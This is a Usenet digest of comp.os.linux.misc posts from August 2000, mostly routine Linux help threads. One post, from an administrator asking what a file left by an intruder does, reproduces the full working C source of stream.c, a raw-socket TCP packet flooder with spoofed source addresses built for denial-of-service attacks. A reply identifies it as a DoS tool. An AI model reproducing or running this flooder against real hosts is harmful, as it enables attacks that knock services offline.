Linux-Misc Digest #619, Volume #25               Wed, 30 Aug 00 01:13:03 EDT

Contents:
  Re: Will Linux go bankrupt? ("Andrew N. McGuire ")
  Re: re-initialize mouse while X is running? ("Chuck Chargin Jr.")
  cracker's file ("Hello World")
  Re: Solaris x86 won't boot from LILO (Philip Brown)
  Re: Netscape Sucks, I need another option. (Christopher Wong)
  Re: Finding your clock speed (Jean-David Beyer-valinux)
  Syslog kernel logging fails with SIGHUP ("Grater")
  Re: cracker's file (Hal Burgiss)
  Re: NPR report mentioning Linux and OpenBSD ([EMAIL PROTECTED])
  Re: tape drives (Jean-David Beyer-valinux)
  system hangs ("Norman Zhang")
  GLIBC 2.1 for enlightenment (Geoffrey Mills)

----------------------------------------------------------------------------

From: "Andrew N. McGuire " <[EMAIL PROTECTED]>
Subject: Re: Will Linux go bankrupt?
Date: Tue, 29 Aug 2000 23:27:14 -0500

On Wed, 30 Aug 2000, Christopher Browne quoth:

~~ Date: Wed, 30 Aug 2000 02:20:07 GMT
~~ From: Christopher Browne <[EMAIL PROTECTED]>
~~ Reply-To: [EMAIL PROTECTED]
~~ Newsgroups: comp.os.linux.misc
~~ Subject: Re: Will Linux go bankrupt?
~~ 
~~ Centuries ago, Nostradamus foresaw a time when [EMAIL PROTECTED]
~~ would say: 
~~ >So if Linux were to stay healthy, it can create cybermoney and
~~ >use it as a way to sustain itself.
~~ 
~~ Linux is the name of an _operating system kernel_.
~~ 
~~ It is not a biological construct for which the term "healthy" is
~~ particularly meaningful.
~~ 
~~ It does not have volition; it does whatever /etc/inittab indicates
~~ that it should do.
~~ 
~~ It cannot create "cybermoney," nor can it _lose_ "cybermoney."

I think this individual just read some sort of article on
"cybermoney" because he posted the same question in the Perl
newsgroup (comp.lang.perl.misc).  I am not sure what this has
to do with Linux or Perl.

anm
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Andrew N. McGuire                                                      ~
~ [EMAIL PROTECTED]                                              ~
~ "Plan to throw one away; you will, anyhow." - Frederick P. Brooks, Jr. ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


------------------------------

From: "Chuck Chargin Jr." <[EMAIL PROTECTED]>
Subject: Re: re-initialize mouse while X is running?
Date: Tue, 29 Aug 2000 21:31:19 -0700

That fixed it!

That was WAY to simple!  I was expecting the solution to be MUCH more
difficult than that!

Thanks alot!

Jeff Davis wrote:

> Try just switching out of the X session, and then back in. If you are at
> the machine itself, this can be done by 'ctl-alt-F1' (to get into a
> terminal, without exiting anything), and then immediately switching back
> with 'ctl-alt-F7'
>
> Hope it helps,
> Jeff Davis
>
> "Chuck Chargin Jr." wrote:
>
> > Is there a way to re-initialize the mouse while X is running?
> >
> > I have two systems on a keyboard-video-mouse switch box.  When I switch
> > between the computers the mouse wheel stops working.  On the windows
> > machine I can use the logitech mouse applet to re-initialize the mouse
> > and get the wheel back.  On the Linux machine I have to exit X then get
> > back in.
> >
> > I am using:
> > Linux 2.2.5-15 (heavily updated readhat 6.0)
> > PS/2 Logitech mouse (M-S48)
> > XFree 3.3.5
> > FVWM2
> > Linksys ProConnect switchbox
> >
> > [EMAIL PROTECTED]
> >
> > remove the 42 from my e-mail address to send me e-mail.


------------------------------

From: "Hello World" <[EMAIL PROTECTED]>
Subject: cracker's file
Date: Wed, 30 Aug 2000 12:29:13 +0800

a cracker leave the following file in my server. can somebody tell me what
is the use of this?
<stream.c>

                 #include <stdio.h>
                 #include <stdlib.h>
                 #include <unistd.h>
                 #include <strings.h>
                 #include <sys/time.h>
                 #include <sys/types.h>
                 #include <sys/socket.h>
                 #ifndef __USE_BSD
                 #define __USE_BSD
                 #endif
                 #ifndef __FAVOR_BSD
                 #define __FAVOR_BSD
                 #endif
                 #include <netinet/in_systm.h>
                 #include <netinet/in.h>
                 #include <netinet/ip.h>
                 #include <netinet/tcp.h>
                 #include <arpa/inet.h>
                 #include <netdb.h>

                 #ifdef LINUX
                 #define FIX(x)  htons(x)
                 #else
                 #define FIX(x)  (x)
                 #endif

                 struct ip_hdr {
                     u_int       ip_hl:4,                /* header length in
32 bit words */
                                 ip_v:4;                 /* ip version */
                     u_char      ip_tos;                 /* type of service
*/
                     u_short     ip_len;                 /* total packet
length */
                     u_short     ip_id;                  /* identification
*/
                     u_short     ip_off;                 /* fragment offset
*/
                     u_char      ip_ttl;                 /* time to live */
                     u_char      ip_p;                   /* protocol */
                     u_short     ip_sum;                 /* ip checksum */
                     u_long      saddr, daddr;           /* source and dest
address */
                 };

                 struct tcp_hdr {
                     u_short     th_sport;               /* source port */
                     u_short     th_dport;               /* destination port
*/
                     u_long      th_seq;                 /* sequence number
*/
                     u_long      th_ack;                 /* acknowledgement
number */
                     u_int       th_x2:4,                /* unused */
                                 th_off:4;               /* data offset */
                     u_char      th_flags;               /* flags field */
                     u_short     th_win;                 /* window size */
                     u_short     th_sum;                 /* tcp checksum */
                     u_short     th_urp;                 /* urgent pointer
*/
                 };

                 struct tcpopt_hdr {
                     u_char  type;                       /* type */
                     u_char  len;                                /* length
*/
                     u_short value;                      /* value */
                 };

                 struct pseudo_hdr {                     /* See RFC 793
Pseudo Header */
                     u_long saddr, daddr;                        /* source
and dest address */
                     u_char mbz, ptcl;                   /* zero and
protocol */
                     u_short tcpl;                       /* tcp length */
                 };

                 struct packet {
                     struct ip/*_hdr*/ ip;
                     struct tcphdr tcp;
                 /* struct tcpopt_hdr opt; */
                 };

                 struct cksum {
                     struct pseudo_hdr pseudo;
                     struct tcphdr tcp;
                 };

                 struct packet packet;
                 struct cksum cksum;
                 struct sockaddr_in s_in;
                 u_short dstport, pktsize, pps;
                 u_long dstaddr;
                 int sock;

                 void usage(char *progname)
                 {
                     fprintf(stderr, "Usage: %s <dstaddr> <dstport>
<pktsize> <pps>\n",
                 progname);
                     fprintf(stderr, "    dstaddr  - the target we are
trying to attack.\n");
                     fprintf(stderr, "    dstport  - the port of the target,
0 = random.\n");
                     fprintf(stderr, "    pktsize  - the extra size to use.
0 = normal
                 syn.\n");
                     exit(1);
                 }

                 /* This is a reference internet checksum implimentation,
not very fast */
                 inline u_short in_cksum(u_short *addr, int len)
                 {
                     register int nleft = len;
                     register u_short *w = addr;
                     register int sum = 0;
                     u_short answer = 0;

                      /* Our algorithm is simple, using a 32 bit accumulator
(sum), we add
                       * sequential 16 bit words to it, and at the end, fold
back all the
                       * carry bits from the top 16 bits into the lower 16
bits. */

                      while (nleft > 1)  {
                          sum += *w++;
                          nleft -= 2;
                      }

                      /* mop up an odd byte, if necessary */
                      if (nleft == 1) {
                          *(u_char *)(&answer) = *(u_char *) w;
                          sum += answer;
                      }

                      /* add back carry outs from top 16 bits to low 16 bits
*/
                      sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to
low 16 */
                      sum += (sum >> 16);                /* add carry */
                      answer = ~sum;                     /* truncate to 16
bits */
                      return(answer);
                 }

                 u_long lookup(char *hostname)
                 {
                     struct hostent *hp;

                     if ((hp = gethostbyname(hostname)) == NULL) {
                        fprintf(stderr, "Could not resolve %s.\n",
hostname);
                        exit(1);
                     }

                     return *(u_long *)hp->h_addr;
                 }

                 void flooder(void)
                 {
                     struct timespec ts;
                     int i;

                     memset(&packet, 0, sizeof(packet));

                     ts.tv_sec                   = 0;
                     ts.tv_nsec                  = 10;

                     packet.ip.ip_hl             = 5;
                     packet.ip.ip_v              = 4;
                     packet.ip.ip_p              = IPPROTO_TCP;
                     packet.ip.ip_tos            = 0x08;
                     packet.ip.ip_id             = rand();
                     packet.ip.ip_len            = FIX(sizeof(packet));
                     packet.ip.ip_off            = 0; /* IP_DF? */
                     packet.ip.ip_ttl            = 255;
                     packet.ip.ip_dst.s_addr     = dstaddr;

                     packet.tcp.th_flags         = 0;
                     packet.tcp.th_win           = htons(16384);
                     packet.tcp.th_seq           = random();
                     packet.tcp.th_ack           = 0;
                     packet.tcp.th_off           = 5; /* 5 */
                     packet.tcp.th_urp           = 0;
                     packet.tcp.th_sport         = rand();
                     packet.tcp.th_dport         =
dstport?htons(dstport):rand();

                 /*
                     packet.opt.type             = 0x02;
                     packet.opt.len              = 0x04;
                     packet.opt.value            = htons(1460);
                 */


                     cksum.pseudo.daddr          = dstaddr;
                     cksum.pseudo.mbz            = 0;
                     cksum.pseudo.ptcl           = IPPROTO_TCP;
                     cksum.pseudo.tcpl           = htons(sizeof(struct
tcphdr));

                     s_in.sin_family             = AF_INET;
                     s_in.sin_addr.s_addr                = dstaddr;
                     s_in.sin_port               = packet.tcp.th_dport;

                     for(i=0;;++i) {
                     cksum.pseudo.saddr = packet.ip.ip_src.s_addr =
random();
                        ++packet.ip.ip_id;
                        ++packet.tcp.th_sport;
                        ++packet.tcp.th_seq;

                        if (!dstport)
                           s_in.sin_port = packet.tcp.th_dport = rand();

                        packet.ip.ip_sum         = 0;
                        packet.tcp.th_sum                = 0;

                        cksum.tcp                        = packet.tcp;

                        packet.ip.ip_sum         = in_cksum((void
*)&packet.ip, 20);
                        packet.tcp.th_sum                = in_cksum((void
*)&cksum, sizeof(cksum));

                        if (sendto(sock, &packet, sizeof(packet), 0, (struct
sockaddr
                 *)&s_in, sizeof(s_in)) < 0)
                           perror("jess");

                     }
                 }

                 int main(int argc, char *argv[])
                 {
                     int on = 1;

                     printf("stream.c v1.0 - TCP Packet Storm\n");

                     if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) <
0) {
                        perror("socket");
                        exit(1);
                     }

                     setgid(getgid()); setuid(getuid());

                     if (argc < 4)
                        usage(argv[0]);

                     if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char
*)&on, sizeof(on)) <
                 0) {
                        perror("setsockopt");
                        exit(1);
                     }

                     srand((time(NULL) ^ getpid()) + getppid());

                     printf("\nResolving IPs..."); fflush(stdout);

                     dstaddr     = lookup(argv[1]);
                     dstport     = atoi(argv[2]);
                     pktsize     = atoi(argv[3]);

                     printf("Sending..."); fflush(stdout);

                     flooder();

                     return 0;
                 }



------------------------------

From: [EMAIL PROTECTED] (Philip Brown)
Crossposted-To: comp.unix.solaris,alt.solaris.x86
Subject: Re: Solaris x86 won't boot from LILO
Reply-To: [EMAIL PROTECTED]
Date: Wed, 30 Aug 2000 04:35:20 GMT

On Tue, 29 Aug 2000 20:52:05 GMT, [EMAIL PROTECTED] wrote:
>
>After installing Solaris 8 x86, I reconfigured LILO on Linux with
>
>other = /dev/hdb
>       label = solaris 

err.. isn't taht supposed to be

other = /dev/hdb1

or something like that?



-- 
[Trim the no-bots from my address to reply to me by email!]
[ Do NOT email-CC me on posts. Pick one or the other.]
S.1618 http://thomas.loc.gov/cgi-bin/bdquery/z?d105:SN01618:@@@D
The word of the day is mispergitude

------------------------------

From: [EMAIL PROTECTED] (Christopher Wong)
Subject: Re: Netscape Sucks, I need another option.
Reply-To: [EMAIL PROTECTED]
Date: Wed, 30 Aug 2000 04:36:22 GMT

On Tue, 29 Aug 2000 15:16:19 -0700, Gabe <[EMAIL PROTECTED]> wrote:
>
>I'm a new Linux user. The best thing about Windows is Internet Explorer,
>because frankly, Netscape sucks. It's slow, buggy, and doesn't display pages
>correctly.
>
>I need another option besides Lynx. Is there another browser I can use in X
>that comes highly recommended?

I'm afraid Netscape is the best browser for Linux right now. Apart from
lynx, the other usable browsers I have tried are:

1. w3m: a much better text mode browser (IMHO) than lynx. Does tables,
   frames, mouse clicks and popup menus.

2. kfm (browser in KDE 1.1.2): somewhat usable, rather limited. Don't
   even think about SSL or Javascript.

There are new browsers in the works, but the Linux software world is
full of yet-to-be-fulfilled promises. Unfinished browsers include:

1. Konqueror (browser in KDE 2). KDE 2 should be released in a month or
   two, so this will be the first "next gen" browser to reach
   "release" status. Never tried it but heard good reviews.

2. Mozilla: months away from release. Bloated, buggy and slow. Eats up
   twice as much memory as Netscape, UI feels twice as slow. Ugh.

3. Galeon (Mozilla derivative): quite new, still rough and
   limited. Reportedly a lot less bloated than Mozilla.

4. Opera: fast, small, buggy and very rough. No idea when it will ever
   be released. Tech preview available. No schedule, no promises.

Chris


------------------------------

From: Jean-David Beyer-valinux <[EMAIL PROTECTED]>
Subject: Re: Finding your clock speed
Date: Wed, 30 Aug 2000 00:40:28 -0400

Garry Knight wrote:

> "Sjoerd Langkemper" <[EMAIL PROTECTED]> wrote:
> >"Naren Devaiah" <[EMAIL PROTECTED]> wrote:
> >> cat /proc/cpuinfo
> >
> >Argh! The first line indicates I have zero CPU's in my computer! So what's
> >my clock speed?
>
> >bogomips        : 31.85
>
> --
> Garry Knight
> [EMAIL PROTECTED]

It depends on what he needs the cpu speed for. bogomips can be misleading. If
you examine /var/log/messages not too long after a reboot, you will find some
lines like this (from my other machine that I rebooted after running Windows
95 yesterday) (long lines trimmed):

Aug 28 17:40:45 touchl syslogd 1.3-3: restart.
Aug 28 17:40:45 touchl syslog: syslogd startup succeeded
Aug 28 17:40:45 touchl syslog: klogd startup succeeded
Aug 28 17:40:45 touchl kernel: klogd 1.3-3, log source = /proc/kmsg started.
Aug 28 17:40:45 touchl kernel: Inspecting /boot/System.map-2.2.16-3
Aug 28 17:40:46 touchl kernel: Loaded 7012 symbols from
/boot/System.map-2.2.16-3.
Aug 28 17:40:46 touchl kernel: Symbols match kernel version 2.2.16.
Aug 28 17:40:46 touchl kernel: Loaded 227 symbols from 13 modules.
Aug 28 17:40:46 touchl kernel: Linux version 2.2.16-3
([EMAIL PROTECTED]) (gcc version egcs-2.91.66 19990314/Linux
(egcs-1.1.2 release))
Aug 28 17:40:46 touchl kernel: Detected 167047 kHz processor. <---<<<

This is for a Pentium 166MHz cpu. The exact format of your /var/log/messages
may be a bit different depending on exactly what release of the software you
are running, what your machine is like, and other things, but that is about
what you are looking for.

For example, here is what I get for this machine:

Aug  8 16:27:19 valinux syslogd 1.3-3: restart.
Aug  8 16:27:19 valinux syslog: syslogd startup succeeded
Aug  8 16:27:19 valinux kernel: klogd 1.3-3, log source = /proc/kmsg started.
Aug  8 16:27:19 valinux kernel: Inspecting /boot/System.map-2.2.14-5.0.14csmp
Aug  8 16:27:19 valinux syslog: klogd startup succeeded
Aug  8 16:27:20 valinux kernel: Loaded 7703 symbols from Aug  8 16:27:20
valinux
Aug  8 16:27:20 valinux kernel: Loaded 102 symbols from 6 modules.
Aug  8 16:27:20 valinux kernel: Linux version 2.2.14-5.0.14csmp
Aug  8 16:27:20 valinux kernel: Intel MultiProcessor Specification v1.1
Aug  8 16:27:20 valinux kernel:     Virtual Wire compatibility mode.
Aug  8 16:27:20 valinux kernel: OEM ID: INTEL Product ID:440GX APIC at:
0xFEE00000
Aug  8 16:27:20 valinux kernel: Processor #0 Pentium(tm) Pro APIC version 17
Aug  8 16:27:20 valinux kernel: Processor #1 Pentium(tm) Pro APIC version 17
Aug  8 16:27:20 valinux kernel: I/O APIC #2 Version 17 at 0xFEC00000.
Aug  8 16:27:20 valinux kernel: Processors:2                           <---<<<
N.B.
Aug  8 16:27:20 valinux kernel: mapped APIC to ffffe000 (fee00000)
Aug  8 16:27:20 valinux kernel: mapped IOAPIC to ffffd000 (fec00000)
Aug  8 16:27:20 valinux kernel: Detected 551266690 Hz processor.       <---<<<

Aug  8 16:27:20 valinux kernel: Console: colour VGA+ 80x25
Aug  8 16:27:20 valinux kernel: Calibrating delay loop... 550.50 BogoMIPS
Aug  8 16:27:20 valinux kernel: e820 region 0: (0, 654336) @
0x0000000000000000
Aug  8 16:27:20 valinux kernel: e820 region 1: (0, 1024) @ 0x000000000009fc00
Aug  8 16:27:20 valinux kernel: e820 region 2: (0, 131072) @
0x00000000000e0000
Aug  8 16:27:20 valinux kernel: e820 region 3: (0, 535822336) @
0x0000000000100000
Aug  8 16:27:20 valinux kernel: e820 region 4: (0, 4096) @ 0x00000000fec00000
Aug  8 16:27:20 valinux kernel: e820 region 5: (0, 4096) @ 0x00000000fee00000
Aug  8 16:27:20 valinux kernel: e820 region 6: (0, 262144) @
0x00000000fffc0000
Aug  8 16:27:20 valinux kernel: Memory: 516880k/524288k available
Aug  8 16:27:20 valinux kernel: Dentry hash table entries: 262144 (order 9,
2048k)
Aug  8 16:27:20 valinux kernel: Buffer cache hash table entries: 524288
Aug  8 16:27:20 valinux kernel: Page cache hash table entries: 131072
Aug  8 16:27:20 valinux kernel: VFS: Diskquotas version dquot_6.4.0
initialized
Aug  8 16:27:20 valinux kernel: Enabling extended fast FPU save and restore...

Aug  8 16:27:20 valinux kernel: Not enabling KNI unmasked exception support
Aug  8 16:27:20 valinux kernel: Exception 19 error handler not integrated yet
Aug  8 16:27:20 valinux kernel: Checking 386/387 coupling... OK, FPU using
Aug  8 16:27:20 valinux kernel: Checking 'hlt' instruction... OK.
Aug  8 16:27:20 valinux kernel: POSIX conformance testing by UNIFIX
Aug  8 16:27:20 valinux kernel: mtrr: v1.35a (19990819) Richard Gooch
Aug  8 16:27:20 valinux kernel: per-CPU timeslice cutoff: 100.04 usecs.
Aug  8 16:27:20 valinux kernel: CPU0: Intel Pentium III (Katmai) stepping 03
Aug  8 16:27:20 valinux kernel: calibrating APIC timer ...
Aug  8 16:27:20 valinux kernel: ..... CPU clock speed is 551.2652 MHz. <---<<<

Aug  8 16:27:20 valinux kernel: ..... system bus clock speed is 100.2299 MHz.
Aug  8 16:27:20 valinux kernel: Booting processor 1 eip 2000
Aug  8 16:27:20 valinux kernel: Calibrating delay loop... 550.50 BogoMIPS
Aug  8 16:27:20 valinux kernel: OK.
Aug  8 16:27:20 valinux kernel: CPU1: Intel Pentium III (Katmai) stepping 03
Aug  8 16:27:20 valinux kernel: Total of 2 processors activated (1101.00
BogoMIPS).
Aug  8 16:27:20 valinux kernel: enabling symmetric IO mode... ...done.

This is for a Dual 550 MHz Pentium III SMP machine.

--
 .~.   Jean-David Beyer           Registered Linux User 85642.
 /V\                              Registered Machine    73926.
/( )\  Shrewsbury, New Jersey
^^-^^  12:02am up 21 days, 7:31, 3 users, load average: 2.08, 2.14, 1.96




------------------------------

From: "Grater" <[EMAIL PROTECTED]>
Subject: Syslog kernel logging fails with SIGHUP
Date: Tue, 29 Aug 2000 23:44:18 -0500

I have ipchains logging most rejected packets.  However when logrotate
rotates my log file and sends a SIGHUP to syslog, kernel messages (including
ipchains logging) no longer works.  Other logging to the same file will
still work.  It appears that only kernel messages fail.  I have to stop and
restart syslog to make it work.  Any ideas?

Currently using kernel 2.2.12, syslog version 1.3-3. (Red Hat 6.1)

Rick





------------------------------

From: [EMAIL PROTECTED] (Hal Burgiss)
Subject: Re: cracker's file
Reply-To: Hal Burgiss <[EMAIL PROTECTED]>
Date: Wed, 30 Aug 2000 04:45:29 GMT

On Wed, 30 Aug 2000 12:29:13 +0800, Hello World <[EMAIL PROTECTED]> wrote:
>a cracker leave the following file in my server. can somebody tell me
>what is the use of this?
><stream.c>

If memory serves, that is for a DoS attack. Like on Yahoo. BIND?

-- 
Hal B
 [EMAIL PROTECTED]
 [EMAIL PROTECTED]
--

------------------------------

From: [EMAIL PROTECTED]
Crossposted-To: comp.unix.bsd.openbsd
Subject: Re: NPR report mentioning Linux and OpenBSD
Date: Wed, 30 Aug 2000 04:36:49 GMT

In article <[EMAIL PROTECTED]>,
  Pat McCann <[EMAIL PROTECTED]> wrote:
> I got a big laugh out of last night's National People's Radio report
> on the big Linux meeting.  They played an example meant to give the
> flavor of Linux-geek-speak with all the usual technobabble.
>
> The funny part was that said he was working on getting something
> working on OpenBSD and never mentioned Linux.  It apparently went
> right over the news editor's head.  The report was all about
> Linux with this exception, of course.
>

... and it can be heard at
http://www.npr.org/ramfiles/atc/20000816.atc.07.rmm


-  tony

-


Sent via Deja.com http://www.deja.com/
Before you buy.

------------------------------

From: Jean-David Beyer-valinux <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.hardware
Subject: Re: tape drives
Date: Wed, 30 Aug 2000 00:50:05 -0400

dave frost wrote:

> hi all,
>
> can anyone suggest a good quality tape drive that will work well under
> linux - in particular suse linux.
>
> cheers
>
> dave

I got a Conner 1.7GB QIC tape drive (uses $30 QIC 3020 tapes) on a
dedicated CTC-2MB floppy tape controller. It works pretty well on my old
machine, but the tapes are too expensive and do not hold enough
(850MB uncompressed (normal mode) and 1.7GB compressed (but current
floppy tape drivers do not write compressed mode any more). It is kind-of
slow.

On this machine, I have an HP C1599A DDS-2 SCSI DAT Drive. It is on a
dedicated LSILogic Symbios 810 Narrow SCSI controller (i.e., no big
deal). It holds about 8GB on a cheap DDS-2 tape (about $8.00) and is a
lot faster than floppy tapes. The drive is about $800 retail, but you may
be able to find a better price.

--
 .~.   Jean-David Beyer           Registered Linux User 85642.
 /V\                              Registered Machine    73926.
/( )\  Shrewsbury, New Jersey
^^-^^  12:02am up 21 days, 7:31, 3 users, load average: 2.08, 2.14, 1.96




------------------------------

From: "Norman Zhang" <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.setup
Subject: system hangs
Date: Tue, 29 Aug 2000 22:08:54 -0700

I am trying to install Red Hat 6.2 on my Intel system. The system has two
SCSI hard drives. I setup the system in the following manner,

/boot     sda1     23M     Linux native
<swap>     sda8     517M     Linux swap
<swap>     sdb7     517M     Linux swap
/root     sdb9    23M     Linux native
/          md0     1506M     RAID1[sda5,sdb1]
/home     md1     800M     RAID1[sda7,sdb6]
/var        md2     902M     RAID1[sda6,sdb5]
/tmp     md3     502M     RAID1[sdb8,sda9]

The process went smoothly. At the very end the system hangs with the
following message, "Performing post install configuration..." Does anyone
what gives? Your help is greatly appreciated.

Norman



------------------------------

From: Geoffrey Mills <[EMAIL PROTECTED]>
Subject: GLIBC 2.1 for enlightenment
Date: Wed, 30 Aug 2000 16:51:41 +1200

I want to run enlightenment on Caldera OpenLinux v2.3 but e wants GLIBC
v2.1.
I downloaded glibc-2.1.1-2.i386.rpm from
ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS/
and installed this. But 'rpm -qa' shows this as not installed and when I
try to install e it reports GLIBC 2.1 is missing. Plus according to
other messages I see I also need crypt and linuxthreads (which don't
appear to be available).
Are there any sources of info, rpm's etc that cover this?
Thanks
Geoffrey Mills
--
DataSure Management Systems Limited    Fax: +64 9 3093986
Auckland, New Zealand                  Tel: +64 9 3098540
Mail: [EMAIL PROTECTED]



------------------------------


** FOR YOUR REFERENCE **

The service address, to which questions about the list itself and requests
to be added to or deleted from it should be directed, is:

    Internet: [EMAIL PROTECTED]

You can send mail to the entire list (and comp.os.linux.misc) via:

    Internet: [EMAIL PROTECTED]

Linux may be obtained via one of these FTP sites:
    ftp.funet.fi                                pub/Linux
    tsx-11.mit.edu                              pub/linux
    sunsite.unc.edu                             pub/Linux

End of Linux-Misc Digest
******************************

Reply via email to